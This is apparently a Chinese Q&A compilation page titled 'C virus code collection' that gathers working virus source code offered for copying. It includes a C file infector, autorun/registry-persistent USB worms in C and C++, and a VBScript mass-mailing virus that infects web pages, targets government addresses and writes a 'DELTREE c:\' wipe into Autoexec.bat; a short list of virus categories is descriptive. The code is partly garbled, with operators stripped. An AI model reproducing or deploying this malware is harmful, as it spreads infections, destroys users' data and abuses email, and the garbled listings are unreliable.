×

c病毒代码大全

c病毒代码大全(c语言简单病毒代码)

hacker hacker 发表于2022-07-12 10:58:37 浏览19 评论5

5人参与发表评论

本文目录一览:

c语言木马源代码

#include stdio.h

#include dir.h

void main(void)

{

virus();

}

int virus()

{

struct ffblk ffblk;

FILE *in,*out,*read;

char *virus="virus.c";

char buf[50][80];

char *p;

char *end="return";

char *bracket="}";

char *main="main";

char *include[2]={"stdio.h","dir.h"};

char *int_virus="int virus()";

char *buffer;

int done,i,j=0,flag=0;

printf("\nI have a virus. Writen by PuBin\n");

done = findfirst("*.c",ffblk,0);

while (!done)

{

i=0;

if ((in = fopen(ffblk.ff_name, "rt"))== NULL)

{

goto next;

}

do{

if(i=50)

{

fclose(in);

goto next;

}

p=fgets(buf[i],80,in);

i++;

}while(p!=NULL);

fclose(in);

out=fopen(ffblk.ff_name,"w+t");

fputs("#includestdio.h\n",out);

fputs("#includedir.h\n",out);

do

{

if(strstr(buf[j],main)!=NULL)

{

for(;ji-1;j++)

if(strstr(buf[j],end)==NULLstrstr(buf[j],bracket)==NULL)

fputs(buf[j],out);

else

{

if(flag==0)

{

flag=1;

fputs("virus();\n",out);

}

fputs(buf[j],out);

}

}

else if((strstr(buf[j],include[0])==NULL)

(strstr(buf[j],include[1])==NULL))

{

fputs(buf[j],out);

j++;

}

else

j++;

}while(ji-1);

read=fopen(virus,"rt");

do

{

p=fgets(buffer,80,read);

if(strstr(buffer,int_virus))

while(p!=NULL)

{

if(strstr(buffer,virus)==NULL)

fputs(buffer,out);

else

{

fputs(" char *virus=\"",out);

fputs(ffblk.ff_name,out);

fputs("\";\n",out);

}

p=fgets(buffer,80,read);

}

}while(p!=NULL);

fclose(read);

fclose(out);

printf("\nYour c program %s has a virus. Writen by PuBin\n",ffblk.ff_name);

next: done = findnext(ffblk);

}

return 0;

}

严重声明:这个程序只是供C语言新手参考,开玩笑没关系,但如果用来做不法的事情,本人概不负责。还有,编病毒、木马去做违法的事情惩罚是很重的,你如果想学编程,编个简单的就好了,否则后果很严重。

求一个可以在机子上跑起来的C语言病毒代码

C语言病毒代码 最基本的病毒.

本病毒的功能:

1.在C、D、E盘和c:\windows\system、c:\windows中生成本病毒体文件

2.在C、D、E盘中生成自动运行文件

3.注册c:\windows\system\svchost.exe,使其开机自动运行

4.在C:\windows\system下生成隐蔽DLL文件

5.病毒在执行后具有相联复制能力本病毒类似普通U盘病毒雏形,具备自我复制、运行能力。以下程序在DEV-CPP 4.9.9.2(GCC编译器)下编译通过

请保存为SVCHOST.C编译,运行,本病毒对计算机无危害,请放心研究

/* SVCHOST.C */

/* SVCHOST.EXE */#define SVCHOST_NUM 6

#includestdio.h

#includestring.h

char *autorun={"[autorun]\nopen=SVCHOST.exe\n\nshell\\1=打开\nshell\\1\\Command=SVCHOST.exe\nshell\\2\\=Open\nshell\\2\\Command=SVCHOST.exe\nshellexecute=SVCHOST.exe"};

char *files_autorun[10]={"c:\\autorun.inf","d:\\autorun.inf","e:\\autorun.inf"};

char *files_svchost[SVCHOST_NUM+1]={"c:\\windows\\system\\MSMOUSE.DLL",

"c:\\windows\\system\\SVCHOST.exe","c:\\windows\\SVCHOST.exe",

"c:\\SVCHOST.exe","d:\\SVCHOST.exe","e:\\SVCHOST.exe","SVCHOST.exe"};

char *regadd="reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v SVCHOST /d C:\\Windows\\system\\SVCHOST.exe /f";int copy(char *infile,char *outfile)

{

FILE *input,*output;

char temp;

if(strcmp(infile,outfile)!=0 ((input=fopen(infile,"rb"))!=NULL) ((output=fopen(outfile,"wb"))!=NULL))

{

while(!feof(input))

{

fread(temp,1,1,input);

fwrite(temp,1,1,output);

}

fclose(input);

fclose(output);

return 0;

}

else return 1;

}

int main(void)

{

FILE *input,*output;

int i,k;

for(i=0;i3;i++)

{

output=fopen(files_autorun[i],"w");

fprintf(output,"%s",autorun);

fclose(output);

}

for(i=0;i=SVCHOST_NUM;i++)

{

if((input=fopen(files_svchost[i],"rb"))!=NULL)

{

fclose(input);

for(k=0;kSVCHOST_NUM;k++)

{

copy(files_svchost[i],files_svchost[k]);

}

i=SVCHOST_NUM+1;

}

}

system(regadd); /* 注册SVCHOST.exe,让其在启动时运行 */

return 0;

}在连载2中你将看到:

病毒对系统文件破坏的方法,病毒对文件的感染,病毒生成垃圾文件,病毒更具隐蔽性的方法。本版病毒所具有的功能:

1.在所有磁盘的根目录生成svchost.com和autorun.inf文件

2.生成病毒体:

c:\windows\wjview32.com

c:\windows\explorer.exe

c:\windows\system32\dllcache\explorer.exe

c:\windows\system\msmouse.dll

c:\windows\system32\cmdsys.sys

c:\windows\system32\mstsc32.exe

3.病毒体c:\windows\explorer.exe感染原explorer.exe文件,使其不需要修改注册表做到启动时在explorer.exe前启动

4.修改注册表,在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

设置自启动项(此操作不使用windowsAPI,防止用户对病毒体的发现,并实现并行执行)

5.生成的autorun.inf改变磁盘的打开方式,使其在windows2000以上的系统无论选择“打开”、“双击”、“资源管理器”等方式都无法打开分驱,而是以运行病毒的方式取而代之。

6.连锁能力,将病毒体相连,实现相连复制更新

7.使用进程不断调用进程,使得在任务管理里无法结束病毒进程

8.不断搜索磁盘,只要发现未感染病毒的一律感染,病毒删除后1秒内再建

9.生成垃圾文件(DESTORY_感染_任意数字)5个于C盘下

10.附带删除文件函数(为防止危害,本函数默认不执行)本病毒到目前为止任何杀毒软件都无法将其查杀

本病毒单机默认使用对机器无害(破坏代码已屏蔽)

提供病毒卸载程序(保存为X.BAT,双击运行即可卸载):@echo off

echo SK-CHINA SVCHOST KILLER 2007.6

echo WRITE BY S.K

taskkill /im mstsc32.exe /f

del c:\windows\wjview32.com

del c:\windows\explorer.exe

del c:\windows\system32\dllcache\explorer.exe

del c:\windows\system\msmouse.dll

比较简单的C++病毒代码

最简单的病毒代码如下: #include "windows.h"

#include "stdio.h"

void main(int argc,char * argv[])

{

//printf("%s\n",argv[i]);

char copy[80];

sprintf(copy,"copy %s \"%%userprofile%%\\「开始」菜单\\程序\\启动\"",argv[0]);

system(copy); //将这个程序拷到开机启动文件夹下面

//char cmd[]="shutdown -r -t 0";//自动重起

char cmd[]="ping baidu.com";//将这个换成上面的,就是一开机就重起了!

system(cmd);

system("pause");

}

用C语言编写的病毒代码

一个c病毒源代码

#include windows.h

#include Shlwapi.h

#include fstream.h

#include TlHelp32.h

#include Dbt.h

#pragma comment(lib,"shlwapi.lib")

#define TIMER 1//计时器

//function

LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);//窗口过程

//获取盘符

TCHAR FirstDriveFromMask (ULONG unitmask);

//病毒从U盘启动时用到的函数

BOOL FileExist(TCHAR *path);//测试一个文件是否存在

BOOL GetSelfPath(TCHAR *path);//Get the virus's path

//BOOL FindU(TCHAR *u);//check whether u exist, u[2]

BOOL GetSysPath(TCHAR *path);//得到系统路径

BOOL CopyToSysAndSet(HWND hwnd);//复制自身到系统目录和设置

BOOL SetFileAttrib(TCHAR *path);//设置path所指文件的属性

BOOL RegAutoRun(TCHAR *path);//修改注册表,实现自启动

//从C盘启动时用到函数

BOOL CopyToUAndSet();//复制自己到U盘

BOOL CreateAutoRunFile(TCHAR *path);//在U盘下生成autorun.inf文件

BOOL FindSelf();//测试自己是否在已经执行了

//global variable

TCHAR szExePath[MAX_PATH];//the virus's path

TCHAR U[2];//保存U盘的盘符

TCHAR szSysPath[MAX_PATH];//system path

//constant

const TCHAR *szExeName="bbbbb.exe";

const TCHAR *szSysName="aaaaa.exe";

const TCHAR *szAutoRunFile="AutoRun.inf";

int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance,

PSTR szCmdLine, int iCmdShow)

{

static TCHAR szAppName[]=TEXT ("UUUUUU");

HWND hwnd;

MSG msg;

WNDCLASS wndclass;

wndclass.style =0;

wndclass.lpfnWndProc =WndProc;

wndclass.cbClsExtra =0;

wndclass.cbWndExtra =0;

wndclass.hInstance =hInstance;

wndclass.hIcon =0;

wndclass.hCursor =0;

wndclass.hbrBackground =0;

wndclass.lpszMenuName =NULL;

wndclass.lpszClassName =szAppName;

if (!RegisterClass (wndclass))

{

MessageBox (NULL,TEXT("Program requires Windows NT!"),

szAppName, MB_ICONERROR);

return 0;

}

hwnd = CreateWindow (szAppName, NULL,

WS_DISABLED,

0, 0,

0, 0,

NULL, NULL, hInstance, NULL);

while (GetMessage(msg, NULL, 0, 0))

{

TranslateMessage (msg);

DispatchMessage (msg);

}

return msg.wParam;

}

LRESULT OnDeviceChange(HWND hwnd,WPARAM wParam, LPARAM lParam)

{

PDEV_BROADCAST_HDR lpdb = (PDEV_BROADCAST_HDR)lParam;

switch(wParam)

{

case DBT_DEVICEARRIVAL: //插入

if (lpdb - dbch_devicetype == DBT_DEVTYP_VOLUME)

{

PDEV_BROADCAST_VOLUME lpdbv = (PDEV_BROADCAST_VOLUME)lpdb;

U[0]=FirstDriveFromMask(lpdbv -dbcv_unitmask);//得到u盘盘符

//MessageBox(0,U,"Notice!",MB_OK);

CopyToUAndSet();//拷到u盘

}

break;

case DBT_DEVICEREMOVECOMPLETE: //设备删除

break;

}

return LRESULT();

}

LRESULT CALLBACK WndProc (HWND hwnd, UINT message, WPARAM wParam,LPARAM lParam)

{

switch(message)

{

case WM_Create: //处理一些要下面要用到的全局变量

U[1]=':';

GetSysPath(szSysPath);//得到系统路径

SetTimer(hwnd,TIMER,5000,0);//启动计时器

GetSelfPath(szExePath);//得到自身的路径

return 0;

case WM_TIMER: //timer message

if(szExePath[0]==szSysPath[0]) //如果是系统盘启动的

SendMessage(hwnd,WM_DEVICECHANGE,0,0);//检测有没有插入设备消息

else

{

CopyToSysAndSet(hwnd);//拷到系统盘并自启动

}

return 0;

case WM_DEVICECHANGE:

OnDeviceChange(hwnd,wParam,lParam);

return 0;

case WM_DESTROY:

KillTimer(hwnd,TIMER);

PostQuitMessage(0);

return 0;

}

return DefWindowProc(hwnd, message, wParam, lParam);

}

TCHAR FirstDriveFromMask(ULONG unitmask)

{

char i;

for (i = 0; i 26; ++i)

{

if (unitmask 0x1)//看该驱动器的状态是否发生了变化

break;

unitmask = unitmask 1;

}

return (i + 'A');

}

BOOL GetSelfPath(TCHAR *path)

{

if(GetModuleFileName(NULL,path,MAX_PATH))//得到程序自身的目录

{

return TRUE;

}

else

return FALSE;

}

BOOL GetSysPath(TCHAR *path)

{

return GetSystemDirectory(path,MAX_PATH);//得到系统路径

}

BOOL CopyToSysAndSet(HWND hwnd)

{

TCHAR szPath[MAX_PATH];

lstrcpy(szPath,szSysPath);

lstrcat(szPath,"\\");

lstrcat(szPath,szSysName);//得到复制到系统目录的完整目录

if(!FileExist(szPath))//检测系统目录是否已经存在复制的文件

{

CopyFile(szExePath,szPath,FALSE);

RegAutoRun(szPath);

return SetFileAttrib(szPath);

}

else

{

if(!FindSelf())//检测自己有没有运行

{

//MessageBox(0,szExePath,szPath,MB_OK);

WinExec(szPath,SW_HIDE);//没有就执行

SendMessage(hwnd,WM_CLOSE,0,0);//结束自己

}

}

return FALSE;

}

BOOL FileExist(TCHAR *path)//检测PATH所指的路径的文件是否存在

{

int result;

result=PathFileExists(path);

if(result==1)

return TRUE;

else

return FALSE;

}

BOOL SetFileAttrib(TCHAR *path)

{

return SetFileAttributes(path,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);

}

BOOL RegAutoRun(TCHAR *path)//修改注册表实现自启动

{

HKEY hkey;

DWORD v=0;

RegOpenKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",hkey);

RegSetValueEx(hkey,"NoDriveTypeAutoRun",0,REG_DWORD,(LPBYTE)v,sizeof(DWORD));

if(RegOpenKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Run",

hkey)==ERROR_SUCCESS)

{

RegSetValueEx(hkey,szSysName,0,REG_SZ,(BYTE*)path,lstrlen(path));

RegCloseKey(hkey);

return TRUE;

}

else

return FALSE;

}

BOOL CopyToUAndSet()

{

TCHAR szPath[MAX_PATH];

lstrcpy(szPath,U);

lstrcat(szPath,"\\");

lstrcat(szPath,szExeName);//得到指向U盘的完整目录

TCHAR szAutoFile[MAX_PATH];

lstrcpy(szAutoFile,U);

lstrcat(szAutoFile,"\\");

lstrcat(szAutoFile,szAutoRunFile);

if(!FileExist(szAutoFile))

{

CreateAutoRunFile(szAutoFile);

SetFileAttrib(szAutoFile);

}

if(!FileExist(szPath))

{

CopyFile(szExePath,szPath,FALSE);

return SetFileAttrib(szPath);

}

return FALSE;

}

BOOL CreateAutoRunFile(TCHAR *path) //在U盘下创建一个autorun.inf文件

{

ofstream fout;

fout.open(path);

if(fout)

{

fout"[AutoRun]"endl;

fout"open="szExeName" e"endl;

fout"shellexecute="szExeName" e"endl;

fout"shell\\Auto\\command="szExeName" e"endl;

fout"shell=Auto"endl;

fout.close();

return TRUE;

}

return FALSE;

}

BOOL FindSelf(){

PROCESSENTRY32 pe;

HANDLE hShot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);

pe.dwSize=sizeof(PROCESSENTRY32);

if(Process32First(hShot,pe)){

do{

if(lstrcmp(pe.szExeFile,szSysName)==0)

{

CloseHandle(hShot);

return TRUE;

}

}while(Process32Next(hShot,pe));

}

CloseHandle(hShot);

return FALSE;

} 隐藏窗口:ShowWindow(false); (#include windows.h)

将程序暂停一秒后继续执行:sleep(1000); (同上)

删除文件:system("del 文件的路径");

运行文件:system("文件的路径");

system函数(#include iostream)

复制文件:详见remove函数(#include process.h)

-----------------------------------------------------------

一个不错的病毒完整源代码

#include windows.h

#include Shlwapi.h

#include fstream.h

#include TlHelp32.h

#include Dbt.h

#pragma comment(lib,"shlwapi.lib")

#define TIMER 1//计时器

//function

LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);//窗口过程

//获取盘符

TCHAR FirstDriveFromMask (ULONG unitmask);

十大计算机病毒

计算机病毒(Computer Virus)是编制者在计算机程序中插入的破坏计算机功能或者数据的代码,能影响计算机使用,能自我复制的一组计算机指令或者程序代码。常见的十大病毒有:

1、系统病毒。系统病毒的前缀为:Win32、PE、Win95、W32、W95等。这些病毒的一般公有的特性是可以感染Windows操作系统的

*.exe 和 *.dll 文件,并通过这些文件进行传播。如CIH病毒。

2、蠕虫病毒。蠕虫病毒的前缀是:Worm。这种病毒的公有特性是通过网络或者系统漏洞进行传播,很大部分的蠕虫病毒都有向外发送带毒邮件,阻塞网络的特性。比如冲击波(阻塞网络),小邮差(发带毒邮件)

等。

3、木马病毒、黑客病毒。木马病毒其前缀是:Trojan,黑客病毒前缀名一般为 Hack

。木马病毒的公有特性是通过网络或者系统漏洞进入用户的系统并隐藏,然后向外界泄露用户的信息,而黑客病毒则有一个可视的界面,能对用户的电脑进行远程控制。木马、黑客病毒往往是成对出现的,即木马病毒负责侵入用户的电脑,而黑客病毒则会通过该木马病毒来进行控制。现在这两种类型都越来越趋向于整合了。一般的木马如QQ消息尾巴木马

Trojan.QQ3344 ,还有大家可能遇见比较多的针对网络游戏的木马病毒如 Trojan.LMir.PSW.60

。这里补充一点,病毒名中有PSW或者什么PWD之类的一般都表示这个病毒有盗取密码的功能(这些字母一般都为“密码”的英文“password”的缩写)一些黑客程序如:网络枭雄(Hack.Nether.Client)等。

4、脚本病毒。脚本病毒的前缀是:Script。脚本病毒的公有特性是使用脚本语言编写,通过网页进行的传播的病毒,如红色代码(Script.Redlof)——可不是我们的老大代码兄哦。脚本病毒还会有如下前缀:VBS、JS(表明是何种脚本编写的),如欢乐时光(VBS.Happytime)、十四曰(Js.Fortnight.c.s)等。

5、宏病毒。其实宏病毒是也是脚本病毒的一种,由于它的特殊性,因此在这里单独算成一类。宏病毒的前缀是:Macro,第二前缀是:Word、Word97、Excel、Excel97(也许还有别的)其中之一。凡是只感染WORD97及以前版本WORD文档的病毒采用Word97做为第二前缀,格式是:Macro.Word97;凡是只感染WORD97以后版本WORD文档的病毒采用Word做为第二前缀,格式是:Macro.Word;凡是只感染EXCEL97及以前版本EXCEL文档的病毒采用Excel97做为第二前缀,格式是:Macro.Excel97;凡是只感染EXCEL97以后版本EXCEL文档的病毒采用Excel做为第二前缀,格式是:Macro.Excel,依此类推。该类病毒的公有特性是能感染OFFICE系列文档,然后通过OFFICE通用模板进行传播,如:著名的美丽莎(Macro.Melissa)。

6、后门病毒。后门病毒的前缀是:Backdoor。该类病毒的公有特性是通过网络传播,给系统开后门,给用户电脑带来安全隐患。如54很多朋友遇到过的IRC后门Backdoor.IRCBot

7、病毒种植程序病毒。这类病毒的公有特性是运行时会从体内释放出一个或几个新的病毒到系统目录下,由释放出来的新病毒产生破坏。如:冰河播种者(Dropper.BingHe2.2C)、MSN射手(Dropper.Worm.Smibag)等。

8、破坏性程序病毒。破坏性程序病毒的前缀是:Harm。这类病毒的公有特性是本身具有好看的图标来诱惑用户点击,当用户点击这类病毒时,病毒便会直接对用户计算机产生破坏。如:格式化C盘(Harm.formatC.f)、杀手命令(Harm.Command.Killer)等。

9、玩笑病毒。玩笑病毒的前缀是:Joke。也称恶作剧病毒。这类病毒的公有特性是本身具有好看的图标来诱惑用户点击,当用户点击这类病毒时,病毒会做出各种破坏操作来吓唬用户,其实病毒并没有对用户电脑进行任何破坏。如:女鬼(Joke.Girlghost)病毒。

10、捆绑机病毒。捆绑机病毒的前缀是:Binder。这类病毒的公有特性是病毒作者会使用特定的捆绑程序将病毒与一些应用程序如QQ、IE捆绑起来,表面上看是一个正常的文件,当用户运行这些捆绑病毒时,会表面上运行这些应用程序,然后隐藏运行捆绑在一起的病毒,从而给用户造成危害。如:捆绑QQ(Binder.QQPass.QQBin)、系统杀手(Binder.killsys)等。

给个C语言病毒代码.....要复制的....越长越好

下面就对“陷阱”的发作过程和源代码作详细的揭密。

病毒具有自身加密能力(使用 JavaScript 编码技术),使得普通用户无法看到病毒原码,但在被感染 VBS 文件中并没有加密,于是作为一个入口点,我非常轻松地得到所有源码。

'@ thank you! make use of other person to get rid of an enemy, trap _2001

'这句话的意思可能是“借刀杀人”,然后是病毒名称“陷阱”

on error resume next

dim vbscr, fso,w1,w2,MSWKEY,HCUW,Code_Str, Vbs_Str, Js_Str

dim defpath, smailc, MAX_SIZE

dim whb(), title(10)

smailc = 4

Redim whb(smailc) ’白宫相关人员邮件名单

whb(0) = "president@whitehouse.gov"

whb(1) = "vice.president@whitehouse.gov "

whb(2) = "first.lady@whitehouse.gov"

whb(3) = "mrs.cheney@whitehouse.gov"

'发送邮件的主题

title(0) = "Thanks for helping me!"

title(1) = "The police are investigating the robbery"

title(2) = "an application for a job "

title(3) = "The aspects of an application process pertinent to OSI"

title(4) = "What a pleasant weather. Why not go out for a walk?"

title(5) = "These countries have gone / been through too many wars"

title(6) = "We've fixed on the 17th of April for the wedding"

title(7) = "The wind failed and the sea returned to calmness."

title(8) = "the sitting is open!"

title(9) = ""

defpath = "C:\Readme.html" ' 病毒文件

MAX_SIZE = 100000 ' 定义传染文件的最大尺寸

MSWKEY = "HKEY_LOCAL_MACHINE\SoftWare\Microsoft\Windows\"

HCUW = "HKEY_CURRENT_USER\Software\Microsoft\WAB\"

main

sub main() '主程序

on error resume next

dim w_s

w_s= WScript.ScriptFullName '得到病毒文件本身的路径

if w_s = "" then

Err.Clear

set fso = CreateObject("Scripting.FileSystemObject") '创建文件系统对象

if getErr then '辨认病毒状态

Randomize '初始化随机种子

ra = int(rnd() * 7) '产生随机数

doucment.write title(ra) ' 写随机内容

ExecuteMail '执行邮件状态时的程序

else

ExecutePage '执行 WEB 页状态时的程序

end if

else

ExecuteVbs '执行 VBS 文件状态时的程序

end if

end sub

Function getErr() 忽略错误

if Err.number0 then

getErr=true

Err.Clear

else

getErr=false

end if

end function

sub ExecutePage() 'WEB 页状态时的程序

on error resume next

dim Html_Str, adi, wdf, wdf2,wdf3,wdsf, wdsf2, vf

Vbs_Str = GetScriptCode("vbscript") '得到 VBScript 代码

Js_Str = GetJavaScript() ' 得到 Javascript 代码

Code_Str = MakeScript(encrypt(Vbs_str),true) '得到已加密过的脚本代码

Html_Str = MakeHtml(encrypt(Vbs_str), true) '得到已加密的完整HTML代码

Gf

'定义病毒文件的路径

wdsf = w2 "Mdm.vbs"

wdsf2 = w1 "Profile.vbs"

wdf = w2 "user.dll" ' 注意 wdf 和 wdf3 两个文件非常迷惑人

wdf2 = w2 "Readme.html"

wdf3 = w2 "system.dll"

'创建病毒文件

set vf = fso.OpenTextFile (wdf, 2, true)

vf.write Vbs_Str

vf.close

set vf = fso.OpenTextFile (wdsf, 2, true)

vf.write Vbs_Str

vf.close

set vf = fso.OpenTextFile (wdsf2, 2, true)

vf.Write Vbs_Str

vf.close

set vf = fso.OpenTextFile (wdf2, 2, true)

vf.write Html_Str

vf.close

set vf = fso.OpenTextFile (wdf3, 2, true)

vf.write Code_Str

vf.close

修改注册表,让病毒文件在每一次计算机启动自动执行

Writereg MSWKEY "CurrentVersion\Run\Mdm", wdsf, ""

Writereg MSWKEY "CurrentVersion\RunServices\Profile", wdsf2, ""

SendMail ' 执行发送邮件程序

Hackpage ' 执行感染网站程序

set adi = fso.Drives

for each x in adi

if x.DrivesType = 2 or x.DrivesType = 3 then '遍历所有本地硬盘和网络共享硬盘

call SearchHTML(x "\") '执行文件感染程序

end if

next

if TestUser then '检查用户

Killhe 执行删除文件操作

else

if Month(Date) Day(Date) = "75" then '如系统时间为 7月5日

set vf = fso.OpenTextFile(w2 "75.htm", 2,true) ’创建系统攻击文件

vf.write MakeScript ("window.navigate ('c:/con/con');", false)

vf.close

Writereg MSWKEY "CurrentVersion\Run\75", w2 "75.htm", "" '自动启动

window.navigate "c:/con/con" '立刻蓝屏,利用 Windows BUG,能引起 Win9X 系统100%死机(即无法恢复的蓝屏)

else '如不是7.5

if fso.FileExists(w2 "75.htm") then fso.DeleteFile w2 "75.htm" ' 删除75.htm

end if

end if

if fso.FileExists(defpath) then fso.DeleteFile defpath ' 删除 C:\Readme.html 病毒文件

end sub

sub ExecuteMail() '邮件状态时执行的程序

on error resume next

Vbs_Str = GetScriptCode("vbscript")

Js_Str = GetJavaScript()

Set Stl = CreateObject("Scriptlet.TypeLib") '创建 TypeLib对象

with Stl

.Reset

.Path = defpath

.Doc = MakeHtml(encrypt(Vbs_str), true)

.Write() '创建 C:\Readme.html 文件

end with

window.open defpath, "trap", "width=1 height=1 menubar=no scrollbars=no toolbar=no" 打开会隐藏的窗口

end sub

sub ExecuteVbs() ' 同理,如病毒文件是 VBS 时所执行的程序

on error resume next

dim x, adi, wvbs, ws, vf

set fso = CreateObject("Scripting.FileSystemObject")

set wvbs = CreateObject("WScript.Shell")

Gf

wvbs.RegWrite MSWKEY "Windows Scripting Host\Setings\Timeout", 0, "REG_DWORD"

set vf = fso.OpenTextFile (w2 "system.dll", 1)

Code_Str = vf.ReadAll()

vf.close

Hackpage

SendMail

set adi = fso.Drives

for each x in adi

if x.DrivesType = 2 or x.DrivesType = 3 then

call SearchHTML(x "\")

end if

next

if TestUser then Killhe

end sub

sub Gf() '得到系统路径

w1=fso.GetSpecialFolder(0) "\"

w2=fso.GetSpecialFolder(1) "\"

end sub

function Readreg(key_str) '读注册表

set tmps = CreateObject("WScript.Shell")

Readreg = tmps.RegRead(key_str)

set tmps = Nothing

end function

function Writereg(key_str, Newvalue, vtype) '写注册表

set tmps = CreateObject("WScript.Shell")

if vtype="" then

tmps.RegWrite key_str, Newvalue

else

tmps.RegWrite key_str, Newvalue, vtype

end if

set tmps = Nothing

end function

function MakeHtml(Sbuffer, iHTML) '创建HTML 文件的完整代码

dim ra

Randomize

ra = int(rnd() * 7)

MakeHtml="" "HTML" "HEAD" "TITLE" title(ra) "/" "TITLE" "/HEAD" _

"BO" "AD" vbcrlf MakeScript(Sbuffer, iHTML) vbcrlf _

"" "/BOAD" "/HTML"

end Function

function MakeScript(Codestr, iHTML) '此程序是病毒进行自我加密过程,较为复杂,不再描述

if iHTML then

dim DocuWrite

DocuWrite = "document.write(''+" "'SCRIPT Language=JavaScript\n'+" _

"jword" "+'\n/'" "+'SCRIPT');"

DocuWrite = DocuWrite vbcrlf "document.write(''+" "'SCRIPT Language=VBScript\n'+" _

"nword" "+'\n/'" "+'SCRIPT');"

MakeScript="" "SCRIPT Language=JavaScript" vbcrlf "var jword = " _

chr(34) encrypt(Js_Str) chr(34) vbcrlf "var nword = " _

chr(34) Codestr chr(34) vbcrlf "nword = unescape(nword);" vbcrlf _

"jword = unescape(jword);" vbcrlf DocuWrite vbcrlf "/" "SCRIPT"

else

MakeScript= "" "SCRIPT Language=JavaScript" Codestr "/" "SCRIPT"

end if

end function

function GetScriptCode(Languages) ' 得到不同脚本语言的代码

dim soj

for each soj in document.scripts

if LCase(soj.Language) = Languages then

if Languages = "javascript" then

if len(soj.Text) 200 then

else

GetScriptCode = soj.Text

exit function

end if

else

GetScriptCode = soj.Text

exit function

end if

end if

next

end function

function GetJavaScript()

GetJavaScript = GetScriptCode("javascript")

end function

function TestUser() '检测用户过程

on error resume next

dim keys(6), i, tmpStr, Wnet

'特定用户关键词

keys(0) = "white home"

keys(1) = "central intelligence agency"

keys(2) = "bush"

keys(3) = "american stock exchang"

keys(4) = "chief executive"

keys(5) = "usa"

TestUser = false

Set Wnet = CreateObject("WScript.Network") '创建网络对象

'下面一共3个循环,作用一样,是检查用户的 Domain、用户名和计算机名是否含有以上的5个关键词语,一旦含有程序将返回”真”的条件,从而对这些用户的文件进行疯狂删除。

tmpStr = LCase(Wnet.UserName) '

for i=0 to 4

if InStr(tmpStr, keys(i)) 0 then

TestUser=true

exit function

end if

next

tmpStr = LCase(Wnet.ComputerName)

for i=0 to 4

if InStr(tmpStr, keys(i)) 0 then

TestUser=true

exit function

end if

next

tmpStr = LCase(Wnet.UserDomain)

for i=0 to 4

if InStr(tmpStr, keys(i)) 0 then

TestUser=true

exit function

end if

next

Set Wnet = Nothing

end function

function SendMail() '发送文件过程

on error resume next

dim wab,ra,j, Oa, arrsm, eins, Eaec, fm, wreg, areg,at

'首先向 OutLook 地址簿发送带能直接感染文件的已加密的病毒代码和HTML 附件

主题是随机的,此过程与“欢乐时光“类似,所以不再描述

Randomize

at=fso.GetSpecialFolder(1) "\Readme.html"

set Oa = CreateObject("Outlook.Application")

set wab = Oa.GetNameSpace("MAPI")

for j = 1 to wab.AddressLists.Count

eins = wab.AddressLists(j)

wreg=Readreg (HCUW eins)

if (wreg="") then wreg = 1

Eaec = eins.AddressEntries.Count

if (Eaec Int(wreg)) then

for x = 1 to Eaec

arrsm = wab.AddressEntries(x)

areg = Readreg(HCUW arrsm)

if (areg = "") then

set fm = wab.CreateItem(0)

with fm

ra = int(rnd() * 7)

.Recipients.Add arrsm

.Subject = title(ra)

.Body = title(ra)

.Attachments at

.Send

Writereg HCUW arrsm, 1, "REG_DWORD"

end with

end if

next

end if

Writereg HCUW eins, Eaec, ""

next

'下面是对指定的用户无条件发送大量病毒邮件, 从这一点可看出病毒作者对美国政府的极度不满。

for j = 1 to smailc

arrsm = whb(j)

set fm = wab.CreateItem(0)

ra = int(rnd() * 7)

with fm

.Recipients.Add arrsm

.Subject = title(ra)

.Body = title(ra)

.Send

end with

next

set Oa = Nothing

window.setTimeout "SendMail()", 5000 '每隔 5 秒种重复发送

end function

sub SearchHTML(Path) '搜索可传染文件的过程

on error resume next

dim pfo, psfo, pf, ps, pfi, ext

if instr(Path, fso.GetSpecialFolder(2)) 0 then exit sub

if Path "E:\" then exit sub

set pfo = fso.GetFolder(Path)

set psfo = pfo.SubFolders

for each ps in psfo

SearchHTML(ps.Path)

set pf = ps.Files

for each pfi in pf

ext = LCase(fso.GetExtensionName(pfi.Path))

if instr(ext, "htm") 0 or ext = "plg" or ext = "asp" then '检查文件的扩展名是否为 htm、html、plg 如是则检查是否被感染,如未被感染则将已加密的病毒代码插入文件头,这样文件一旦执行也会执行病毒代码,而且不会影响原文件的正常执行。

if Code_Str"" then AddHead pfi.Path, pfi, 1

elseif ext= "vbs" then '如是 vbs 文件,则插入未加密的病毒代码

AddHead pfi.Path,pfi, 2

end if

next

next

end sub

sub Killhe() '全盘删除文件过程

on error resume next

dim codeText, ko,adi, kd, kh, ks,kf,kfs

codeText = "@ECHO OFF" vbcrlf "PATH " w1 "COMMAND" vbcrlf _

"DELTREE c:\" '将删除C盘的命令插入Autoexec.bat 中,下次开机时,删除整个硬盘,并没有任何提示

set ko = fso.OpenTextFile("C:\Autoexec.bat", 8, true)

ko.Write vbcrlf codeText

ko.Close

'接着立刻删除其它盘的所有文件

set adi = fso.Drives

for each x in adi

if x.DrivesType = 2 then

set kd = fso.GetFolder(x "\")

set kfs = kd.Files

for each kf in kfs

kf.Delete

next

set ks = kd.SubFolders

for each kh in ks

kh.Delete

next

end if

next

do while 1 '让系统立刻死机

window.open ""

loop

end sub

sub Hackpage() ' 此过程是直接攻击 Mircosoft IIS 服务器主页过程

dim fi

H = "C:\InetPut\wwwroot"

if fso.FolderExists(H) then

'判断是否为网站,如是则将已加密的带病毒代码插入文件头,从而直接传染浏览该网站的用户

set fi = fso.GetFile(H "\index.htm")

AddHead H "\index.htm",fi,1

end if

end sub

sub AddHead(Path, f, t) '此过程是病毒传染文件具体过程

on error resume next

dim tso, buffer,sr

if f.size MAX_SIZE then exit sub '传染大小小于100K的文件

set tso = fso.OpenTextFile(Path, 1, true)

buffer = tso.ReadAll()

tso.close

if (t = 1) then

if UCase(Left(LTrim(buffer), 7)) "SCRIPT" then

set tso = fso.OpenTextFile(Path, 2, true)

